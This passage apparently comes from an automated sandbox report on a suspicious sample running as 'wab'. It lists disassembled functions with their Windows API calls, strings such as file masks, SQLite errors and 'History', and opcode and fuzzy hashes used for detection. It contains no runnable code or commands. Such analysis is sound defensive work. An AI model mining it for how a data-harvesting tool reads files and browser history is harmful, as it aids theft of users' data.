                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                • API String ID: 2618321458-3614832568
                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004185FC
                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@AttributesFilememset
                                                • String ID:
                                                • API String ID: 776155459-0
                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                • malloc.MSVCRT ref: 00417524
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                • String ID:
                                                • API String ID: 2308052813-0
                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PathTemp$??3@
                                                • String ID: %s\etilqs_$etilqs_
                                                • API String ID: 1589464350-1420421710
                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040FDD5
                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                • API String ID: 1775345501-2769808009
                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • wcscpy.MSVCRT ref: 0041477F
                                                • wcscpy.MSVCRT ref: 0041479A
                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$CloseCreateFileHandle
                                                • String ID: General
                                                • API String ID: 999786162-26480598
                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLastMessage_snwprintf
                                                • String ID: Error$Error %d: %s
                                                • API String ID: 313946961-1552265934
                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: foreign key constraint failed$new$oid$old
                                                • API String ID: 0-1953309616
                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                • API String ID: 3510742995-272990098
                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: gj
                                                • API String ID: 1297977491-4203073231
                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                • malloc.MSVCRT ref: 004174BD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                • String ID:
                                                • API String ID: 2903831945-0
                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 0040D453
                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$Rect$ClientParentPoints
                                                • String ID:
                                                • API String ID: 4247780290-0
                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                • memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                • String ID:
                                                • API String ID: 1471605966-0
                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcscpy.MSVCRT ref: 0044475F
                                                • wcscat.MSVCRT ref: 0044476E
                                                • wcscat.MSVCRT ref: 0044477F
                                                • wcscat.MSVCRT ref: 0044478E
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                • String ID: \StringFileInfo\
                                                • API String ID: 102104167-2245444037
                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$??3@
                                                • String ID: g4@
                                                • API String ID: 3314356048-2133833424
                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _memicmpwcslen
                                                • String ID: @@@@$History
                                                • API String ID: 1872909662-685208920
                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004100FB
                                                • memset.MSVCRT ref: 00410112
                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                • _snwprintf.MSVCRT ref: 00410141
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                • String ID: </%s>
                                                • API String ID: 3400436232-259020660
                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040D58D
                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                • String ID: caption
                                                • API String ID: 1523050162-4135340389
                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                • String ID: MS Sans Serif
                                                • API String ID: 210187428-168460110
                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClassName_wcsicmpmemset
                                                • String ID: edit
                                                • API String ID: 2747424523-2167791130
                                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
